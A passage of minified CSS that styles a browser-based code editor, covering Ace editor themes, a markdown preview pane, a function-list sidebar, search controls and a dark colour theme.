.preview-markdown-frame .markdown-setting ul a:hover{background:#63acff;color:#fff;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a:hover i{color:#fff;}.edit-right-frame .function-list .function-list-tool{height:100px;width:100%;}.edit-right-frame .function-search{position:absolute;top:30px;left:0;height:25px;right:5px;}.edit-right-frame .function-search input{padding:3px 2%;color:#222;margin:0 3%;width:90%;border-radius:3px;}.edit-right-frame .function-search .search-reset{position:absolute;top:5px;right:5%;font-size:1.25em;color:#aaa;display:block;cursor:pointer;}.edit-right-frame .function-search .search-reset:hover{color:#888;}.edit-right-frame .frame-right .function-list-parent{top:57px;}.edit-right-frame .function-list-box .cell b{color:#378eef;}.edit-right-frame .function-list-box .row-select .cell b{color:#ff9;}.edit-right-frame .function-list-tool{border:none;}.edit-right-frame .function-list-tool .box{width:100%;right:0px;overflow:hidden;background:#fff;}.edit-right-frame .function-list-tool .box span{display:block;padding:1px 10px;float:left;line-height:27px;}.edit-right-frame .function-list-tool .box a{display:block;float:right;margin-right:5px;}.edit-right-frame .function-list-parent{position:absolute;top:55px;right:0;bottom:15px;width:100%;background:#fff;}.edit-right-frame .function-list-box{padding:5px;-webkit-text-size-adjust:none;overflow:auto;margin-right:2px;height:100%;}.edit-right-frame .function-list-box .row-hover{background:#ddd;border-radius:3px;}.edit-right-frame .function-list-box .row-select{background:#63acff;color:#fff;border-radius:3px;}.edit-right-frame .function-list-box .cell-null{padding:10px 5px;color:#999;text-align:center;}.edit-right-frame .function-list-box .list-row{padding:2px 5px;cursor:default;font-family:Tahoma, Arial;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;}.edit-right-frame .function-list-box .list-row.row-hover{background:#ddd;border-radius:3px;}.edit-right-frame .function-list-box .list-row.row-select{background:#63acff;color:#fff;border-radius:3px;}.edit-right-frame .function-list-box .list-row .icon{font-family:FontAwesome;font-style:normal;width:20px;display:inline-block;text-decoration:inherit;font-size:10px;-webkit-transform:scale(0.8,0.8);transform:scale(0.8,0.8);}.edit-right-frame .function-list-box .list-row span{cursor:default;}.edit-right-frame .function-list-box .list-row.mark .icon{color:#666;}.edit-right-frame .function-list-box .list-row.mark .icon:before{content:"\f005";}.edit-right-frame .function-list-box .list-row.mark,.edit-right-frame .function-list-box .list-row.class{background:#eee;font-weight:800;border-radius:3px;}.edit-right-frame .function-list-box .list-row.mark.row-select,.edit-right-frame .function-list-box .list-row.class.row-select{color:#fff;background:#63acff;}.edit-right-frame .function-list-box .list-row.row-select .icon{color:#fff !important;}.edit-right-frame .function-list-box .list-row.class .icon{color:#888;}.edit-right-frame .function-list-box .list-row.class .icon:before{content:"\f0c9";}.edit-right-frame .function-list-box .list-row.function .icon{color:#378eef;}.edit-right-frame .function-list-box .list-row.function .icon:before{content:"\f111";}.edit-right-frame .function-list-box .list-row.function-define .icon{color:#98c878;}.edit-right-frame .function-list-box .list-row.function-value .icon{color:#ffb16d;}.edit-right-frame .function-list-box .list-row.function-var .icon{color:#008641;}.share-page-passowrd{margin:0 auto;width:220px;height:120p;margin-top:17%;border:1px solid #ddd;border-top:3px solid #666;padding:40px;border-radius:5px;background:#f6f6f6;}.share-page-passowrd b{font-size:20px;display:block;margin-bottom:20px;}.share-page-passowrd input{height:32px;display:inline-block;width:150px;padding:0px 5px;margin-right:10px;margin-bottom:10px;}.share-page-error{margin:0 auto;width:400px;margin-top:17%;border:1px solid #eee;padding:30px;border-radius:5px;background:#f6f6f6;font-size:1.25em;}.share-page-error b{font-size:25px;display:block;margin-bottom:20px;}.edit-content.markdown-full-page pre.ace_editor{width:100% !important;}.edit-content.markdown-full-page .resize{display:none;}.edit-content.markdown-full-page .edit-right-frame{top:0px;left:-1px;right:0;width:100% !important;bottom:0;}.edit-content.markdown-full-page .edit-right-frame .right-main{width:100% !important;}.edit-content.markdown-full-page .edit-right-frame .display-markdown{width:100% !important;background:none;}.edit-content.markdown-full-page .edit-right-frame .markdown-preview{width:80%;padding:50px 0;}.edit-content.markdown-full-page .edit-right-frame i.icon-resize-full:before{content:"\f066";}.edit-content.markdown-full-page .edit-right-frame .preview-markdown-tool .toolbar{width:80%;left:10%;border:none;border-bottom:1px solid #ddd;background:rgba(240,240,240,0.5);}.edit-content.markdown-full-page .edit-right-frame .preview-markdown-tool .toolbar{display:none;}.edit-content.markdown-full-page .edit-content.markdown-full-page .edit-right-frame a[markdown-action=tool-markdown-full]{pointer-events:none;}.edit-content.markdown-full-page .edit-content.markdown-full-page .edit-right-frame - a[markdown-action=tool-markdown-full] i.font-icon{color:#ccc !important;}.edit-content.markdown-full a[markdown-action=tool-markdown-max]{display:none;pointer-events:none;}.edit-content.markdown-full a[markdown-action=tool-markdown-max] i.font-icon{color:#ccc !important;}.markdown-preview{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;text-align:justify;margin:auto;font-size:13px;line-height:1.6em;color:#555;}.markdown-preview article,.markdown-preview footer,.markdown-preview header,.markdown-preview nav{width:700px;margin:0 auto;}.markdown-preview article{margin-top:4em;margin-bottom:4em;min-height:400px;}.markdown-preview footer{margin-bottom:50px;}.markdown-preview video{margin:2em 0;border:1px solid #ddd;}.markdown-preview nav{font-size:.9em;font-style:italic;border-bottom:1px solid #ddd;padding:1em 0;}.markdown-preview nav p{margin:0;}.markdown-preview details{margin:15px 0;}.markdown-preview summary{cursor:pointer;padding:4px;}.markdown-preview summary:focus{outline:none;box-shadow:0 0 3px #2196F3;}.markdown-preview .h1,.markdown-preview h1{font-size:2.2em;}.markdown-preview .h2,.markdown-preview h2{font-size:1.9em;}.markdown-preview .h3,.markdown-preview h3{font-size:1.6em;}.markdown-preview .h4,.markdown-preview h4{font-size:1.3em;}.markdown-preview .h5,.markdown-preview h5{font-size:1.2em;}.markdown-preview .h6,.markdown-preview h6{font-size:1.1em;}.markdown-preview .h1,.markdown-preview .h2,.markdown-preview .h3,.markdown-preview .h4,.markdown-preview .h5,.markdown-preview .h6,.markdown-preview h1,.markdown-preview h2,.markdown-preview h3,.markdown-preview h4,.markdown-preview h5,.markdown-preview h6{font-family:inherit;font-weight:500;color:#333;line-height:1.5em;padding:0;margin:1em 0 0.5em 0;}.markdown-preview .h1,.markdown-preview h1{letter-spacing:1px;border-bottom:1px solid #ddd;}.markdown-preview .h2,.markdown-preview h2{padding-bottom:0.15em;}.markdown-preview p{-webkit-hypens:auto;-moz-hypens:auto;hyphens:auto;margin:10px 0;word-wrap:break-word;}.markdown-preview blockquote{margin-left:1em;padding:10px 20px;margin:10px 0 20px 0;border-left:10px solid #ddd;background:#f6f6f6;}.markdown-preview blockquote p{margin:0;}.markdown-preview code{padding:2px 4px;color:#c7254e;background-color:#f9f2f4;border-radius:4px;}.markdown-preview pre{display:block;padding:0;overflow:auto;margin:0 0 10px;font-size:1em;line-height:1.42857143;word-break:break-all;word-wrap:break-word;color:#333;background:none;border-radius:4px;}.markdown-preview code,.markdown-preview kbd,.markdown-preview pre,.markdown-preview samp{font-family:Consolas, 'Liberation Mono', 'Ubuntu Mono', Menlo, Courier, sans-serif;}.markdown-preview pre code{background:#f8f8f8;color:#777;white-space:pre-wrap;padding:6px 1em;border:1px solid #eee;display:block;}.markdown-preview a{color:#1980e6;text-decoration:none;}.markdown-preview a:hover{text-decoration:underline;}.markdown-preview a img{border:none;}.markdown-preview img{max-width:100%;}.markdown-preview h1 a,.markdown-preview h1 a:hover{text-decoration:none;}.markdown-preview hr{border:0 none;height:4px;margin:1.2em 0;background:rgba(0,0,0,0) url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;}@media screen and (min-width:900px){.markdown-preview body{ width:900px;}}.markdown-preview ul,.markdown-preview ol{padding:0.5em 0 0.5em 3em;}.markdown-preview table{border-collapse:collapse;border-spacing:0;margin-bottom:20px;}.markdown-preview table thead{background:#eee;}.markdown-preview table td,.markdown-preview table th{padding:.5em;border:1px solid #ddd;line-height:1.5;}.markdown-preview .markdown-latex{text-align:center;margin-bottom:1.5em;font-size:1.6em;color:#000;}.markdown-preview .latex-inline .katex-display{display:inline-block;font-size:0.8em;}.markdown-preview .markdown-menu ul{padding:0 10px 20px 20px;}.markdown-preview .markdown-menu li{font-size:14px;list-style:none;line-height:1.8em;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.markdown-preview .markdown-menu-h2{padding-left:2em;}.markdown-preview .markdown-menu-h3{padding-left:4em;}.markdown-preview .markdown-menu-h4{padding-left:6em;}.markdown-preview .markdown-menu-h5{padding-left:8em;}.markdown-preview .markdown-menu-h6{padding-left:10em;}.markdown-preview div .hljs{color:#666;}.markdown-preview .hljs-comment,.markdown-preview .hljs-quote{color:#8e908c;}.markdown-preview .hljs-variable,.markdown-preview .hljs-template-variable,.markdown-preview .hljs-tag,.markdown-preview .hljs-name,.markdown-preview .hljs-selector-id,.markdown-preview .hljs-selector-class,.markdown-preview .hljs-regexp,.markdown-preview .hljs-deletion{color:#c82829;}.markdown-preview .hljs-number,.markdown-preview .hljs-built_in,.markdown-preview .hljs-builtin-name,.markdown-preview .hljs-literal,.markdown-preview .hljs-type,.markdown-preview .hljs-params,.markdown-preview .hljs-meta,.markdown-preview .hljs-link{color:#f5871f;}.markdown-preview .hljs-attribute{color:#eab700;}.markdown-preview .hljs-string,.markdown-preview .hljs-symbol,.markdown-preview .hljs-bullet,.markdown-preview .hljs-addition{color:#718c00;}.markdown-preview .hljs-title,.markdown-preview .hljs-section{color:#4271ae;}.markdown-preview .hljs-keyword,.markdown-preview .hljs-selector-tag{color:#8959a8;}.markdown-preview .hljs{display:block;overflow-x:auto;color:#4d4d4c;padding:0.5em;}.markdown-preview .hljs-emphasis{font-style:italic;}.markdown-preview .hljs-strong{font-weight:bold;}.code-theme-black .markdown-preview{background:#333;color:#bbb;}.code-theme-black .markdown-preview blockquote{border-color:#555;background:#444;}.code-theme-black .markdown-preview pre,.code-theme-black .markdown-preview code,.code-theme-black .markdown-preview pre code{color:#777;border-color:#444;background:#444;}.code-theme-black .markdown-preview code{color:#C5AC18;background:#555;background:rgba(255,255,255,0.15);}.code-theme-black .markdown-preview a{color:#FFA500;}.code-theme-black .markdown-preview hr{border-bottom:1px solid #444;background-image:none;}.code-theme-black .markdown-preview .h1,.code-theme-black .markdown-preview .h2,.code-theme-black .markdown-preview .h3,.code-theme-black .markdown-preview .h4,.code-theme-black .markdown-preview .h5,.code-theme-black .markdown-preview .h6,.code-theme-black .markdown-preview h1,.code-theme-black .markdown-preview h2,.code-theme-black .markdown-preview h3,.code-theme-black .markdown-preview h4,.code-theme-black .markdown-preview h5,.code-theme-black .markdown-preview h6{color:#fff;}.code-theme-black .markdown-preview table thead{background:#3e3e3e;}.code-theme-black .markdown-preview table td,.code-theme-black .markdown-preview table th{border-color:#444;}.code-theme-black .markdown-preview .markdown-latex{color:#fff;}.code-theme-black .markdown-preview div .hljs{display:block;overflow-x:auto;padding:.5em;background:#23241f;}.code-theme-black .markdown-preview .hljs,.code-theme-black .markdown-preview .hljs-subst,.code-theme-black .markdown-preview .hljs-tag{color:#f8f8f2;}.code-theme-black .markdown-preview .hljs-emphasis,.code-theme-black .markdown-preview .hljs-strong{color:#a8a8a2;}.code-theme-black .markdown-preview .hljs-bullet,.code-theme-black .markdown-preview .hljs-link,.code-theme-black .markdown-preview .hljs-literal,.code-theme-black .markdown-preview .hljs-number,.code-theme-black .markdown-preview .hljs-quote,.code-theme-black .markdown-preview .hljs-regexp{color:#ae81ff;}.code-theme-black .markdown-preview .hljs-code,.code-theme-black .markdown-preview .hljs-section,.code-theme-black .markdown-preview .hljs-selector-class,.code-theme-black .markdown-preview .hljs-title{color:#a6e22e;}.code-theme-black .markdown-preview .hljs-strong{font-weight:700;}.code-theme-black .markdown-preview .hljs-emphasis{font-style:italic;}.code-theme-black .markdown-preview .hljs-attr,.code-theme-black .markdown-preview .hljs-keyword,.code-theme-black .markdown-preview .hljs-name,.code-theme-black .markdown-preview .hljs-selector-tag{color:#f92672;}.code-theme-black .markdown-preview .hljs-attribute,.code-theme-black .markdown-preview .hljs-symbol{color:#66d9ef;}.code-theme-black .markdown-preview .hljs-class .hljs-title,.code-theme-black .markdown-preview .hljs-params{color:#f8f8f2;}.code-theme-black .markdown-preview .hljs-addition,.code-theme-black .markdown-preview .hljs-built_in,.code-theme-black .markdown-preview .hljs-builtin-name,.code-theme-black .markdown-preview .hljs-selector-attr,.code-theme-black .markdown-preview .hljs-selector-id,.code-theme-black .markdown-preview .hljs-selector-pseudo,.code-theme-black .markdown-preview .hljs-string,.code-theme-black .markdown-preview .hljs-template-variable,.code-theme-black .markdown-preview .hljs-type,.code-theme-black .markdown-preview .hljs-variable{color:#e6db74;}.code-theme-black .markdown-preview .hljs-comment,.code-theme-black .markdown-preview .hljs-deletion,.code-theme-black .markdown-preview .hljs-meta{color:#75715e;}.ace_optionsMenuEntry{height:22px;}.ace_optionsMenuCommand{float:left;width:210px;}.context-menu-list .context-menu-item.line-top{border-top:1px solid #eee !important;}body .ace_editor{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;font-variant-ligatures:no-common-ligatures;margin:0;padding:0;position:absolute;height:100%;left:0px;right:0%;background:#fff;}body .ace_editor .ace_scrollbar{right:3px;}body .ace_editor .ace_hidden-cursors .ace_cursor{opacity:0.7;}body .ace_editor.ace-tomorrow .ace_cursor{color:#3c3434;}body .ace_editor.ace_multiselect .ace_cursor{border-left-width:2px;}body .ace_editor .ace_indent-guide{height:103%;display:inline-block;}body .ace_editor .ace_line{line-height:1.3em;line-height:inherit \9;}body .ace_editor span.ace_heading{font-weight:800;}body .ace_editor.ace_autocomplete{padding:0px;box-shadow:0px 2px 10px rgba(0,0,0,0.3);margin-left:5px;box-shadow:0 0 7px rgba(119,119,119,0.2), inset 1px 1px 0 rgba(0,0,0,0), inset -1px -1px 0 rgba(0,0,0,0);font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;background:#fff !important;}body .ace_editor.ace_autocomplete .ace_scrollbar-v{padding:0px;right:0px;}body .ace_editor.ace_autocomplete .ace_line{padding-left:6px;line-height:1.5em;}body .ace_editor.ace_autocomplete .ace_marker-layer .ace_active-line{background:#63acff !important;border-radius:0px;z-index:10;}body .ace_editor.ace_autocomplete .ace_line-hover{border:none;margin-top:0;background:#e6e6e6;border-radius:0px;}body .ace_editor.ace_autocomplete .ace_selected{color:#fff;}body .ace_editor.ace_autocomplete .ace_completion-highlight{color:#2882be;}body .ace_editor.ace_autocomplete .ace_rightAlignedText{color:#aaa;}body .ace_editor.ace_autocomplete .ace_selected .ace_completion-highlight{color:#cfe8ff !important;}body .ace_editor.ace_autocomplete .ace_selected .ace_rightAlignedText{color:#fff;z-index:10;opacity:0.5;filter:alpha(opacity=50);font-size:0.9em;}body .ace_editor .ace_content .ace_marker-layer .ace_selected-word{background:rgba(210,235,255,0.11);border:1px solid #65b5f5;z-index:10;}body .ace_editor .ace_content .ace_marker-layer .ace_bracket{border:1px solid #FF9800;background:#FFC107;}body .ace_editor .ace_content .ace_text-layer .ace_keyword{font-weight:600;font-weight:normal \9\0;}body .ace_editor .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-github{color:#444;}body .ace_editor.ace-kuroir{background:#f9f9f9;}body .ace_editor.ace-kuroir .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-solarized-light{background:#FDF6E3;}body .ace_editor.ace-solarized-light .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-ambiance{background:#202020;}body .ace_editor.ace-ambiance .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-monokai{background:#272822;}body .ace_editor.ace-monokai .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-idle-fing{background:#333;}body .ace_editor.ace-idle-fing .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-pastel-on-dark{background:#2C2828;}body .ace_editor.ace-pastel-on-dark .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-solarized-dark{background:#002B36;}body .ace_editor.ace-solarized-dark .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-twilight{background:#141414;}body .ace_editor.ace-twilight .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-idle-fingers{background:#333;}body .ace_editor.ace-idle-fingers .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-tomorrow-night-blue{background:#002451;}body .ace_editor.ace-tomorrow-night-blue .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-tomorrow-night-eighties{background:#2d2d2d;}body .ace_editor.ace-tomorrow-night-eighties .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-eclipse .ace_gutter{border-right:3px solid #6ce26c !important;}body .ace_editor.ace_dark .ace_content .ace_marker-layer .ace_selected-word{background:rgba(255,255,255,0.1);border:1px solid #4179A7;z-index:10;}body .ace_editor.ace_dark .ace_content .ace_marker-layer .ace_bracket{border:1px solid #FFEB3B;background:#6b6154;}div.ace_tooltip{font-size:1em;font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;border:1px solid #e7de81;background-color:#f9f2ad;padding-bottom:6px;color:#333;background-image:none;filter:none;box-shadow:0 0 7px rgba(119,119,119,0.2), inset 1px 1px transparent, inset -1px -1px transparent;}div.ace_tooltip hr{border:none;border-bottom:1px solid #e7de81;margin:6px 0;}.search-content .ace_search{font-size:13px;border-radius:0px 0px 0px 5px;border-right:0 none;overflow:visible;position:fixed;right:0;background-color:#eee;color:#444;width:100%;max-width:inherit;padding-top:5px;border-top:1px solid #ccc;bottom:0px;}.search-content .ace_search .ace_search_options{text-align:right;position:absolute;top:4px;margin:3px 0 0 20px;}.search-content .ace_search .ace_searchbtn_close{background-position:50% -10%;position:absolute;right:10px;width:18px;height:18px;}.search-content .ace_search .ace_searchbtn_close:hover{background-position:50% 120%;}.search-content .ace_search .ace_search_form,.search-content .ace_search .ace_replace_form{float:inherit;border:none;height:25px;}.search-content .ace_search .ace_search_form .search-info{position:absolute;right:25px;height:25px;line-height:25px;opacity:0.6;filter:alpha(opacity=60);}.search-content .ace_search .ace_search_form .search_at_index,.search-content .ace_search .ace_search_form .search_total_num{padding-left:0.3em;padding-right:0.3em;}.search-content .ace_search .ace_button{margin-left:3px;width:30px;text-align:center;display:inline-block;border-radius:3px;}.search-content .ace_search .ace_button.checked{border-color:#39F;background:#39f;color:#fff;}.search-content .ace_search .ace_search_field{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;background-color:#FFF;border-radius:3px;border:1px solid #ccc;margin:0px;width:100%;height:24px;line-height:23px;}.search-content .ace_search .ace_search_field:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.search-content .ace_search .ace_search_field:focus{box-shadow:0 0 1px #75a1f0;}.search-content .ace_search .ace_search_action{position:absolute;right:50px;}.search-content .ace_search .ace_search_input{position:absolute;left:130px;right:160px;}.search-content .ace_search .ace_replace_form .ace_search_action{right:70px;}.search-content .ace_search .ace_search_form.ace_nomatch{outline:none;}.search-content .ace_search .ace_search_form.ace_nomatch .search-info{color:#f00;font-weight:800;}.search-content .ace_search .search-info.search-first{color:#03a9f4;font-weight:800;}.search-content .ace_search .history-list{position:absolute;right:8px;}.search-content .ace_search .history-list .dropdown-menu:before{right:4px;}.search-content .ace_search .history-list .dropdown-menu:after{right:5px;}.search-content .ace_search .history-list .dropdown-menu li > a{padding:3px 20px;font-size:13px;}.search-content .ace_search .history-list .dropmenu{width:20px;height:20px;background:rgba(50,50,50,0.05);cursor:pointer;font-size:15px;margin-top:2px;color:#ccc;display:inline-block;line-height:20px;text-align:center;border-radius:2px;}.search-content .ace_search .history-list .dropmenu:hover{background:rgba(50,50,50,0.2);color:#aaa;}.search-content .ace_search .history-list.open .dropmenu{background:rgba(50,50,50,0.2);color:#aaa;}.search-content .ace_search .btn-background{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;}.search-content .ace_search .btn-background-hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn,.search-content .ace_search .ace_replacebtn{float:left;padding:0 8px;border:1px solid #dcdcdc;margin-left:-1px;background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;}.search-content .ace_search .ace_searchbtn:hover,.search-content .ace_search .ace_replacebtn:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn:active,.search-content .ace_search .ace_replacebtn:active{outline:none;background:#ddd;}.search-content .ace_search .ace_searchbtn.next,.search-content .ace_search .ace_replacebtn.next{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;padding:0 4px;}.search-content .ace_search .ace_searchbtn.next:hover,.search-content .ace_search .ace_replacebtn.next:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn.prev,.search-content .ace_search .ace_replacebtn.prev{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;padding:0 4px;}.search-content .ace_search .ace_searchbtn.prev:hover,.search-content .ace_search .ace_replacebtn.prev:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.code-theme-black{background:#333;}.code-theme-black pre{background:#333;}.code-theme-black div.tools{box-shadow:1px 2px 15px #3d3d3d;border-bottom:1px solid #474747;background:#3d3d3d;}.code-theme-black div.tools .right .btn{border:solid 1px #474747;background:#3d3d3d;color:#eef;}.code-theme-black div.tools .right .btn:hover{background:#474747;}.code-theme-black div.tools .line{border-color:#595959;}.code-theme-black div.tools a.select,.code-theme-black div.tools a.select:hover,.code-theme-black div.tools a:active,.code-theme-black div.tools a:hover{background:#595959;}.code-theme-black div.tools a .font-icon{color:#eef;text-shadow:none;}.code-theme-black div.tools .disable-mask{background:#000;}.code-theme-black .context-menu-list{border:none;background:#595959;border-bottom:none;box-shadow:0 10px 10px rgba(0,0,0,0.15);}.code-theme-black .context-menu-list .context-menu-item{color:#eef;border-color:rgba(255,255,255,0) !important;}.code-theme-black .context-menu-list .context-menu-item .font-icon{color:#eef;}.code-theme-black .context-menu-list .context-menu-item.context-menu-separator{border-bottom:1px solid #666666 !important;background:none;}.code-theme-black .context-menu-list .context-menu-item.hover,.code-theme-black .context-menu-list .context-menu-item.selected.hover{background:#666666;color:#eef;border-color:transparent !important;}.code-theme-black .context-menu-list .context-menu-item.hover .font-icon,.code-theme-black .context-menu-list .context-menu-item.selected.hover .font-icon{color:#eef;}.code-theme-black .context-menu-list .context-menu-item.line-top{border-top:1px solid #666666 !important;}.code-theme-black .dropdown-menu{background:#595959;}.code-theme-black .dropdown-menu:before{right:4px;}.code-theme-black .dropdown-menu:after{border-top-color:#595959;}.code-theme-black .dropdown-menu li > a{color:#eef;}.code-theme-black .edit-tab .tabs{background:#333;border-bottom:1px solid #474747;}.code-theme-black .edit-tab .tabs .tab{background:#474747;border-right:1px solid #595959;color:#eef;}.code-theme-black .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#666666;}.code-theme-black .edit-tab .tabs .tab.hover{background:#474747;}.code-theme-black .edit-tab .tabs .add{background:#595959;border:1px solid #3d3d3d;color:#eef;}.code-theme-black .edit-tab .tabs .add:hover{background:#666666;}.code-theme-black .edit-tab .tabs .tab.this{background:#666666;border-right:1px solid #666666;border-left:3px solid #63acff;margin-left:-3px;}.code-theme-black .draggable-dragging{background:#595959;border-left:3px solid #63acff;}.code-theme-black .edit-content .resize{background-color:#ddd;background-color:rgba(255,255,255,0.01);}.code-theme-black .edit-content .resize:hover{background-color:#ddd;background-color:rgba(255,255,255,0.1);}.code-theme-black .edit-content .resize.resize-active{background-color:#ddd;background-color:rgba(255,255,255,0.3);}.code-theme-black .edit-right-frame{background:#333;border-left:1px solid #3d3d3d;}.code-theme-black .edit-right-frame .function-list-parent{background:#333;}.code-theme-black .edit-right-frame .function-list-box .list-row{color:#eef;}.code-theme-black .edit-right-frame .function-list-box .list-row.row-hover{background:#3d3d3d;}.code-theme-black .edit-right-frame .function-list-box .list-row.row-select{background:#63acff;}.code-theme-black .edit-right-frame .function-list-box .list-row.mark,.code-theme-black .edit-right-frame .function-list-box .list-row.class{background:#595959;}.code-theme-black .edit-right-frame .preview-url-tool,.code-theme-black .edit-right-frame .function-list-tool{border-bottom:1px solid #3d3d3d;}.code-theme-black .edit-right-frame .preview-url-tool .box,.code-theme-black .edit-right-frame .function-list-tool .box{background:#333;color:#eef;border:none;}.code-theme-black .edit-right-frame .preview-url-tool .box a,.code-theme-black .edit-right-frame .function-list-tool .box a{padding:0px 6px;}.code-theme-black .edit-right-frame .preview-url-tool .box a:hover,.code-theme-black .edit-right-frame .function-list-tool .box a:hover{border:1px solid #666666;}.code-theme-black .edit-right-frame .preview-url-tool .input-content input,.code-theme-black .edit-right-frame .function-list-tool .input-content input{color:#eee;font-size:1.15em;text-shadow:none;background:#444;box-shadow:none;border:none;}.code-theme-black .edit-right-frame .preview-url-tool .input-content input:focus,.code-theme-black .edit-right-frame .function-list-tool .input-content input:focus{box-shadow:none;}.code-theme-black .edit-right-frame .function-search input{color:#eef;border:1px solid #595959;background:#474747;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a .font-icon{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a:hover{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a:hover .font-icon{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar{border-left:1px solid #595959;background:#3d3d3d;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools:hover{background:#666666;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split{color:#3d3d3d;}.code-theme-black .edit-right-frame .markdown-help{background:#474747;color:#eef;border-color:#595959;}.code-theme-black .edit-right-frame .markdown-help h3{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-help h5{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-help pre{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .markdown-menu-box{background:#474747;color:#eef;border-color:#595959;}.code-theme-black .edit-right-frame .markdown-menu-box h3{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-menu-box .markdown-menu li a{color:#ffa500;}.code-theme-black .edit-right-frame .markdown-menu-box .markdown-menu li a:hover{background:#666666;}.code-theme-black .edit-right-frame .markdown-setting{background:#474747;color:#eef;border-color:#595959;}.code-theme-black 